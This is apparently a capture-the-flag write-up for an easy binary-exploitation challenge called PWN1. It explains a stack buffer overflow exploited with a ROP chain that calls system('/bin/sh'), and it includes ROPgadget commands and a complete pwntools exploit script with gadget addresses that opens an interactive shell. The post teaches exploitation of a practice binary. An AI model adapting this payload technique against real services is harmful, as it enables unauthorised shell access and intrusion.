PWN1
Description:
binary exploit
Difficulty:
easy
Solve
this challenge is stack-based buffer overflow with stack canary disabled. ROP chain.
steps to solve:
- figure out the vulnerability using a decompiler like IDA.
- participants should notice a variable of length 10 that is receiving 170 bytes of input (buffer overflow)
- we don’t have a win function here so participants should build a ROP chain to call system(“/bin/sh”)
- we don’t have a LIBC leak to calculate /bin/sh address and system address but those 2 are implemented in the binary which doesn’t have PIE protection enabled.
- extract system and /bin/sh from the binary using GDB or IDA
- build the ROP chain and overwrite the saved return pointer with our payload.
- fix stack alignment to execute the system.
I got the pop_rdi and ret gadget by running these two commands :
1
ROPgadget --binary main | grep "ret"
And got the addr 0x40050e
As for the pop rdi:
1
ROPgadget --binary main | grep "pop rdi"
and then with pwntool module we can build a python script to get an interactive shell and read flag.txt
i wrote this python script for this task
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
system=0x400520
binsh=0x400764
pop_rdi=0x0000000000400723
ret_gadget=0x000000000040050e
p=process("./main")
#p=remote("127.0.0.1",9032)
payload=""
payload+="A"*40
payload+=p64(ret_gadget) #stack allignement
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)
pause()
p.sendline(payload)
p.interactive()
and i got the shell :D
This post is licensed under CC BY 4.0 by the author.